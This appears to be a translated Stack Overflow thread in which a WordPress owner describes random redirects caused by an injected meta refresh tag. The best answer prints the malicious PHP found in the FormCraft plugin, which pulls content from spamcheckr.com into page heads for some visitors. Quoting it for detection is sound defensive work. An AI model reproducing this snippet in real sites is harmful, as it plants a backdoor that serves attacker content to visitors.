你好 StackOverflow 社区。今天我有一个非常有趣的(在我看来)感染要与您分享。
4-5 天前,我意识到我的博客主页在加载几秒钟后被重定向到另一个页面。特别是在 youtube 上,在贾斯汀比伯的视频中。我以为是我电脑的问题,所以我扫描了病毒和恶意软件。但这不是我的错。
最后我确定这不是本地问题,因为谷歌页面速度洞察有相同的结果。
因此,经过数小时的研究(以及一些损坏的键盘),我找到了这些线索。详细说明:
在我的标题中创建了一个元标记,类似于:
<meta http-equiv="refresh" content="0; url=http://www.youtube.com/watch?v=RFngSCaY5nA">
首先,我禁用了所有插件但没有结果。过了一会儿,问题仍然存在。
其次,我搜索了我所有的数据库表,以确定视频的 URL 是否包含在某处,但事实并非如此。
然后我在我的模板编辑器中一一搜索了 php 文件,但一无所获。
.htaccess 也很清楚(不是 100% 确定我在那里寻找什么,但我认为没有任何可疑之处)。
完成所有这些之后,我通过 FTP 下载了我的整个站点,并在每个文件中搜索了这个 URL。我发现它包含在 CACHE 文件夹的一些 HTML 文件中。为此,我使用 W3 Total Cache。我删除了整个缓存文件夹,但过了一会儿问题仍然存在。
有趣的是,这种“病毒”并不总是活跃的。它随机出现,每次出现在不同的页面。同样今晚我意识到它出现在第二台计算机上,同时在我的计算机上一切正常。
Youtube 视频 URL 是:http://www.youtube.com/watch?v=RFngSCaY5nA
所以我的问题是:在删除整个安装并从头开始之前,你们中有人有推荐的解决方案吗?过去有没有其他人和我有同样的问题?
我想这就是我要分享的全部内容。我很抱歉这篇长文章,尽量详细。我不擅长编码,这是我第一次尝试运行 WordPress 网站,所以,我可能忘记了一些东西。
提前致谢。
最佳答案
我有同样的问题,并认为我找到了解决方案!
检查您的站点文件是否有此链接:http://spamcheckr.com/l.php
我在formcraft插件中找到了这个链接。
像这样:
if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}
已编辑:
还要检查一下:http://spamcheckr.com/req.php
关于WordPress 博客感染了 HTML Refresh 元标记,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/22923521/